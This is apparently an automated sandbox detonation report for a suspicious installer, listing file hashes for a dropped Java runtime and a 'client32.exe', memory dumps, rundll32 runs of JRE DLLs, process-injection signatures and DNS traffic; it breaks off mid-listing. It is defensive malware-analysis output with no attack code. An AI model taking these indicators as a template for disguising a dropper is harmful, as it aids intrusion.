| SHA256 | 1e31ef3145d1e30b31107b7afc4a61011ebca99550dce65f945c2ea4ccac714b |
| SHA512 | 29de5832db5b43fdc99bb7ea32a7359441d6cf5c05561dd0a6960b33078471e4740ee08ffbd97a5ced4b7dd9cc98fad6add43edb4418bf719f90f83c58188149 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\Welcome.html
| MD5 | 3cb773cb396842a7a43ad4868a23abe5 |
| SHA1 | ace737f039535c817d867281190ca12f8b4d4b75 |
| SHA256 | f450aee7e8fe14512d5a4b445aa5973e202f9ed1e122a8843e4dc2d4421015f0 |
| SHA512 | 6058103b7446b61613071c639581f51718c12a9e7b6abd3cf3047a3093c2e54b2d9674faf9443570a3bb141f839e03067301ff35422eb9097bd08020e0dd08a4 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\THIRDPARTYLICENSEREADME.txt
| MD5 | 0e87879f452892b85c81071a1ddd5a2a |
| SHA1 | 2cf97c1a84374a6fbbd5d97fe1b432fa799c3b19 |
| SHA256 | 9c18836fd0b5e4b0c57cffdb74574fa5549085c3b327703dc8efe4208f4e3321 |
| SHA512 | 10ba68ffd9deab10a0b200707c3af9e95e27aed004f66f049d41310cb041b7618ee017219c848912d5951599208d385bcb928dd33175652101c7e5bc2e3eba5b |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt
| MD5 | 0e05bd8b9bfcf17f142445d1f8c6561c |
| SHA1 | cf0a9f4040603008891aa0731abf89ce2403f2fb |
| SHA256 | c3ea3996241b8e9ae7db3780e470174076fd2003d8aefaa77bf0bab5e04de050 |
| SHA512 | 07c7865d31d22ba0c68e384afedc22261f7b3a82bebc9324145ff7f631623eca2dc31c71cdbbfc9febc1733451a095302de2a0877821a5b68038e350969bf460 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\slf4j-simple.jar
| MD5 | 722bb90689aecc523e3fe317e1f0984b |
| SHA1 | 8dacf9514f0c707cbbcdd6fd699e8940d42fb54e |
| SHA256 | 0966e86fffa5be52d3d9e7b89dd674d98a03eed0a454fbaf7c1bd9493bd9d874 |
| SHA512 | d5effbfa105bcd615e56ef983075c9ef0f52bcfdbefa3ce8cea9550f25b859e48b32f2ec9aa7a305c6611a3be5e0cde0d269588d9c2897ca987359b77213331d |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\slf4j-api.jar
| MD5 | caafe376afb7086dcbee79f780394ca3 |
| SHA1 | da76ca59f6a57ee3102f8f9bd9cee742973efa8a |
| SHA256 | 18c4a0095d5c1da6b817592e767bb23d29dd2f560ad74df75ff3961dbde25b79 |
| SHA512 | 5dd6271fd5b34579d8e66271bab75c89baca8b2ebeaa9966de391284bd08f2d720083c6e0e1edda106ecf8a04e9a32116de6873f0f88c19c049c0fe27e5d820b |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\release
| MD5 | a61b1e3fe507d37f0d2f3add5ac691e0 |
| SHA1 | 8ae1050ff466b8f024eed5bc067b87784f19a848 |
| SHA256 | f9e84b54cf0d8cb0645e0d89bf47ed74c88af98ac5bf9ccf3accb1a824f7dc3a |
| SHA512 | 3e88a839e44241ae642d0f9b7000d80be7cf4bd003a9e2f9f04a4feb61ec4877b2b4e76151503184f4b9978894ba1d0de034dbc5f2e51c31b3abb24f0eacf0c7 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\README.txt
| MD5 | 4bda1f1b04053dcfe66e87a77b307bb1 |
| SHA1 | b8b35584be24be3a8e1160f97b97b2226b38fa7d |
| SHA256 | fd475b1619675b9fb3f5cd11d448b97eddee8d1f6ddcca13ded8bc6e0caa9cf3 |
| SHA512 | 997cee676018076e9e4e94d61ec94d5b69b148b3152a0148e70d0be959533a13ad0bc1e8b43268f91db08b881bf5050a6d5c157d456597260a2b332a48068980 |
memory/3616-330-0x0000000002360000-0x0000000002368000-memory.dmp
memory/3616-329-0x0000000002310000-0x0000000002318000-memory.dmp
memory/3616-334-0x0000000002368000-0x0000000002370000-memory.dmp
memory/3616-333-0x0000000002318000-0x0000000002320000-memory.dmp
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\security\java.security
| MD5 | 409c132fe4ea4abe9e5eb5a48a385b61 |
| SHA1 | 446d68298be43eb657934552d656fa9ae240f2a2 |
| SHA256 | 4d9e5a12b8cac8b36ecd88468b1c4018bc83c97eb467141901f90358d146a583 |
| SHA512 | 7fed286ac9aed03e2dae24c3864edbbf812b65965c7173cc56ce622179eb5f872f77116275e96e1d52d1c58d3cdebe4e82b540b968e95d5da656aa74ad17400d |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\jsse.jar
| MD5 | fd1434c81219c385f30b07e33cef9f30 |
| SHA1 | 0b5ee897864c8605ef69f66dfe1e15729cfcbc59 |
| SHA256 | bc3a736e08e68ace28c68b0621dccfb76c1063bd28d7bd8fce7b20e7b7526cc5 |
| SHA512 | 9a778a3843744f1fabad960aa22880d37c30b1cab29e123170d853c9469dc54a81e81a9070e1de1bf63ba527c332bb2b1f1d872907f3bdce33a6898a02fef22d |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\net.dll
| MD5 | 691b937a898271ee2cffab20518b310b |
| SHA1 | abedfcd32c3022326bc593ab392dea433fcf667c |
| SHA256 | 2f5f1199d277850a009458edb5202688c26dd993f68fe86ca1b946dc74a36d61 |
| SHA512 | 1c09f4e35a75b336170f64b5c7254a51461dc1997b5862b62208063c6cf84a7cb2d66a67e947cbbf27e1cf34ccd68ba4e91c71c236104070ef3beb85570213ec |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\nio.dll
| MD5 | 95edb3cb2e2333c146a4dd489ce67cbd |
| SHA1 | 79013586a6e65e2e1f80e5caf9e2aa15b7363f9a |
| SHA256 | 96cf590bddfd90086476e012d9f48a9a696efc054852ef626b43d6d62e72af31 |
| SHA512 | ab671f1bce915d748ee49518cc2a666a2715b329cab4ab8f6b9a975c99c146bb095f7a4284cd2aaf4a5b4fcf4f939f54853af3b3acc4205f89ed2ba8a33bb553 |
memory/3616-347-0x0000000002370000-0x0000000002378000-memory.dmp
memory/3616-346-0x0000000002320000-0x0000000002328000-memory.dmp
memory/3616-351-0x0000000002378000-0x0000000002380000-memory.dmp
memory/3616-350-0x0000000002328000-0x0000000002330000-memory.dmp
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\tzdb.dat
| MD5 | 5a7f416bd764e4a0c2deb976b1d04b7b |
| SHA1 | e12754541a58d7687deda517cdda14b897ff4400 |
| SHA256 | a636afa5edba8aa0944836793537d9c5b5ca0091ccc3741fc0823edae8697c9d |
| SHA512 | 3ab2ad86832b98f8e5e1ce1c1b3ffefa3c3d00b592eb1858e4a10fff88d1a74da81ad24c7ec82615c398192f976a1c15358fce9451aa0af9e65fb566731d6d8f |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\tzmappings
| MD5 | b8dd8953b143685b5e91abeb13ff24f0 |
| SHA1 | b5ceb39061fce39bb9d7a0176049a6e2600c419c |
| SHA256 | 3d49b3f2761c70f15057da48abe35a59b43d91fa4922be137c0022851b1ca272 |
| SHA512 | c9cd0eb1ba203c170f8196cbab1aaa067bcc86f2e52d0baf979aad370edf9f773e19f430777a5a1c66efe1ec3046f9bc82165acce3e3d1b8ae5879bd92f09c90 |
memory/3616-357-0x0000000002380000-0x0000000002388000-memory.dmp
memory/3616-356-0x0000000002330000-0x0000000002338000-memory.dmp
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\resources.jar
| MD5 | 9a084b91667e7437574236cd27b7c688 |
| SHA1 | d8926cc4aa12d6fe9abe64c8c3cb8bc0f594c5b1 |
| SHA256 | a1366a75454fc0f1ca5a14ea03b4927bb8584d6d5b402dfa453122ae16dbf22d |
| SHA512 | d603aa29e1f6eefff4b15c7ebc8a0fa18e090d2e1147d56fd80581c7404ee1cb9d6972fcf2bd0cb24926b3af4dfc5be9bce1fe018681f22a38adaa278bf22d73 |
memory/3616-362-0x0000000002388000-0x0000000002390000-memory.dmp
memory/3616-361-0x0000000002338000-0x0000000002340000-memory.dmp
memory/3616-366-0x0000000002390000-0x0000000002398000-memory.dmp
memory/3616-365-0x0000000002340000-0x0000000002348000-memory.dmp
memory/3616-369-0x0000000002348000-0x0000000002350000-memory.dmp
memory/3616-370-0x0000000002398000-0x00000000023A0000-memory.dmp
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr120.dll
| MD5 | 034ccadc1c073e4216e9466b720f9849 |
| SHA1 | f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1 |
| SHA256 | 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f |
| SHA512 | 5f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcp120.dll
| MD5 | fd5cabbe52272bd76007b68186ebaf00 |
| SHA1 | efd1e306c1092c17f6944cc6bf9a1bfad4d14613 |
| SHA256 | 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608 |
| SHA512 | 1563c8257d85274267089cd4aeac0884a2a300ff17f84bdb64d567300543aa9cd57101d8408d0077b01a600ddf2e804f7890902c2590af103d2c53ff03d9e4a5 |
memory/3616-377-0x00000000023A0000-0x00000000023A8000-memory.dmp
memory/3616-376-0x0000000002350000-0x0000000002358000-memory.dmp
memory/3616-379-0x0000000002358000-0x0000000002360000-memory.dmp
memory/3616-380-0x00000000023A8000-0x00000000023B0000-memory.dmp
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\prism_d3d.dll
| MD5 | 5aadadf700c7771f208dda7ce60de120 |
| SHA1 | e9cf7e7d1790dc63a58106c416944fd6717363a5 |
| SHA256 | 89dac9792c884b70055566564aa12a8626c3aa127a89303730e66aba3c045f79 |
| SHA512 | 624431a908c2a835f980391a869623ee1fa1f5a1a41f3ee08040e6395b8c11734f76fe401c4b9415f2055e46f60a7f9f2ac0a674604e5743ab8301dbadf279f2 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\glass.dll
| MD5 | 434cbb561d7f326bbeffa2271ecc1446 |
| SHA1 | 3d9639f6da2bc8ac5a536c150474b659d0177207 |
| SHA256 | 1edd9022c10c27bbba2ad843310458edaead37a9767c6fc8fddaaf1adfcbc143 |
| SHA512 | 9e37b985ecf0b2fef262f183c1cd26d437c8c7be97aa4ec4cd8c75c044336cc69a56a4614ea6d33dc252fe0da8e1bbadc193ff61b87be5dce6610525f321b6dc |
memory/3616-390-0x0000000002360000-0x0000000002368000-memory.dmp
memory/3616-391-0x00000000023B0000-0x00000000023B8000-memory.dmp
memory/3616-392-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3616-398-0x00000000023B8000-0x00000000023C0000-memory.dmp
memory/3616-397-0x0000000002368000-0x0000000002370000-memory.dmp
memory/3616-399-0x0000000002370000-0x0000000002378000-memory.dmp
memory/3616-400-0x00000000023C0000-0x00000000023C8000-memory.dmp
memory/3616-404-0x00000000023C8000-0x00000000023D0000-memory.dmp
memory/3616-403-0x0000000002378000-0x0000000002380000-memory.dmp
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javafx_font.dll
| MD5 | aeada06201bb8f5416d5f934aaa29c87 |
| SHA1 | 35bb59febe946fb869e5da6500ab3c32985d3930 |
| SHA256 | f8f0b1e283fd94bd87abca162e41afb36da219386b87b0f6a7e880e99073bda3 |
| SHA512 | 89bad9d1115d030b98e49469275872fff52d8e394fe3f240282696cf31bccf0b87ff5a0e9a697a05befcfe9b24772d65ed73c5dbd168eed111700caad5808a78 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\awt.dll
| MD5 | 159ccf1200c422ced5407fed35f7e37d |
| SHA1 | 177a216b71c9902e254c0a9908fcb46e8d5801a9 |
| SHA256 | 30eb581c99c8bcbc54012aa5e6084b6ef4fcee5d9968e9cc51f5734449e1ff49 |
| SHA512 | ab3f4e3851313391b5b8055e4d526963c38c4403fa74fb70750cc6a2d5108e63a0e600978fa14a7201c48e1afd718a1c6823d091c90d77b17562b7a4c8c40365 |
memory/3616-412-0x00000000023D0000-0x00000000023D8000-memory.dmp
memory/3616-411-0x0000000002380000-0x0000000002388000-memory.dmp
memory/3616-416-0x00000000023D8000-0x00000000023E0000-memory.dmp
memory/3616-415-0x0000000002388000-0x0000000002390000-memory.dmp
memory/3616-418-0x00000000023E0000-0x00000000023E8000-memory.dmp
memory/3616-417-0x0000000002390000-0x0000000002398000-memory.dmp
memory/3616-419-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3616-423-0x00000000023E8000-0x00000000023F0000-memory.dmp
memory/3616-422-0x0000000002398000-0x00000000023A0000-memory.dmp
memory/3616-425-0x00000000023F0000-0x00000000023F8000-memory.dmp
memory/3616-424-0x00000000023A0000-0x00000000023A8000-memory.dmp
memory/3616-428-0x00000000023A8000-0x00000000023B0000-memory.dmp
memory/3616-429-0x00000000023F8000-0x0000000002400000-memory.dmp
memory/3616-432-0x0000000002400000-0x0000000002408000-memory.dmp
memory/3616-431-0x00000000023B0000-0x00000000023B8000-memory.dmp
memory/3616-434-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3616-436-0x0000000002408000-0x0000000002410000-memory.dmp
memory/3616-435-0x00000000023B8000-0x00000000023C0000-memory.dmp
memory/3616-439-0x0000000002410000-0x0000000002418000-memory.dmp
memory/3616-438-0x00000000023C0000-0x00000000023C8000-memory.dmp
memory/3616-440-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3616-444-0x0000000002418000-0x0000000002420000-memory.dmp
memory/3616-443-0x00000000023C8000-0x00000000023D0000-memory.dmp
memory/3616-449-0x0000000002420000-0x0000000002428000-memory.dmp
memory/3616-448-0x00000000023D0000-0x00000000023D8000-memory.dmp
memory/3616-454-0x0000000002428000-0x0000000002430000-memory.dmp
memory/3616-453-0x00000000023D8000-0x00000000023E0000-memory.dmp
memory/3616-457-0x0000000002430000-0x0000000002438000-memory.dmp
memory/3616-456-0x00000000023E0000-0x00000000023E8000-memory.dmp
memory/3616-460-0x0000000002438000-0x0000000002440000-memory.dmp
memory/3616-459-0x00000000023E8000-0x00000000023F0000-memory.dmp
memory/3616-463-0x0000000002440000-0x0000000002448000-memory.dmp
memory/3616-462-0x00000000023F0000-0x00000000023F8000-memory.dmp
memory/3616-467-0x0000000002448000-0x0000000002450000-memory.dmp
memory/3616-466-0x00000000023F8000-0x0000000002400000-memory.dmp
memory/3616-470-0x0000000002450000-0x0000000002458000-memory.dmp
memory/3616-469-0x0000000002400000-0x0000000002408000-memory.dmp
memory/3616-473-0x0000000002458000-0x0000000002460000-memory.dmp
memory/3616-472-0x0000000002408000-0x0000000002410000-memory.dmp
memory/3616-476-0x0000000002460000-0x0000000002468000-memory.dmp
memory/3616-475-0x0000000002410000-0x0000000002418000-memory.dmp
memory/3616-480-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3616-483-0x0000000002418000-0x0000000002420000-memory.dmp
memory/3616-484-0x0000000002420000-0x0000000002428000-memory.dmp
memory/3616-486-0x0000000002428000-0x0000000002430000-memory.dmp
memory/3616-487-0x0000000002430000-0x0000000002438000-memory.dmp
memory/3616-490-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3616-491-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3616-498-0x0000000002438000-0x0000000002440000-memory.dmp
memory/3616-500-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3616-501-0x0000000002440000-0x0000000002448000-memory.dmp
memory/3616-526-0x0000000000780000-0x0000000000781000-memory.dmp
memory/208-527-0x00007FFE4D410000-0x00007FFE4D582000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aozmvjqy.urj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/208-552-0x00007FFE4D590000-0x00007FFE4D845000-memory.dmp
memory/208-551-0x00007FFE581F0000-0x00007FFE58224000-memory.dmp
memory/208-550-0x00007FF7CB720000-0x00007FF7CB818000-memory.dmp
memory/3320-553-0x00007FFE4D6D0000-0x00007FFE4D842000-memory.dmp
memory/3616-556-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3616-557-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3616-560-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3616-561-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3320-647-0x00007FFE4D6D0000-0x00007FFE4D842000-memory.dmp
memory/3320-650-0x00007FFE53800000-0x00007FFE53834000-memory.dmp
C:\Users\Admin\AppData\Roaming\TempControll\client32.exe
| MD5 | 290c26b1579fd3e48d60181a2d22a287 |
| SHA1 | e4c91a7f161783c68cf67250206047f23bd25a29 |
| SHA256 | 973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128 |
| SHA512 | 114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | b30d3becc8731792523d599d949e63f5 |
| SHA1 | 19350257e42d7aee17fb3bf139a9d3adb330fad4 |
| SHA256 | b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3 |
| SHA512 | 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 752a1f26b18748311b691c7d8fc20633 |
| SHA1 | c1f8e83eebc1cc1e9b88c773338eb09ff82ab862 |
| SHA256 | 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131 |
| SHA512 | a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5 |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 5d8fe5632c9254faaffa00f842a4c4cc |
| SHA1 | 461cd923dddf0e5ea639d6af48cef43b56878730 |
| SHA256 | 80bb553c1ecf11cbd4dcc5ee7f73361d3862e04f3f462a8f073cde420f48d9ae |
| SHA512 | 430183c4667044a8f42b600e6f582489244452760785e44683855c7e6c86d26cbdb780d94ee36f8bf6200a0ccaf46d55eddc2b2f9031c89220630534d88f0633 |
Analysis: behavioral16
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:14
Platform
win10v2004-20240802-en
Max time kernel
147s
Max time network
153s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1900 wrote to memory of 4092 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1900 wrote to memory of 4092 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1900 wrote to memory of 4092 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win10v2004-20240802-en
Max time kernel
121s
Max time network
129s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2248 wrote to memory of 4580 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2248 wrote to memory of 4580 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2248 wrote to memory of 4580 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4276,i,10065386245627775856,6567048529106473151,262144 --variations-seed-version --mojo-platform-channel-handle=4316 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240708-en
Max time kernel
121s
Max time network
125s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 220
Network
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240903-en
Max time kernel
117s
Max time network
121s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2128 wrote to memory of 1308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2128 wrote to memory of 1308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2128 wrote to memory of 1308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2128 wrote to memory of 1308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2128 wrote to memory of 1308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2128 wrote to memory of 1308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2128 wrote to memory of 1308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:14
Platform
win7-20240903-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2516 wrote to memory of 3008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2516 wrote to memory of 3008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2516 wrote to memory of 3008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2516 wrote to memory of 3008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2516 wrote to memory of 3008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2516 wrote to memory of 3008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2516 wrote to memory of 3008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240903-en
Max time kernel
121s
Max time network
125s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 220
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win10v2004-20240802-en
Max time kernel
129s
Max time network
159s
Command Line
Signatures
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\jre\Welcome.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=2152,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=2164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4688,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=4700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
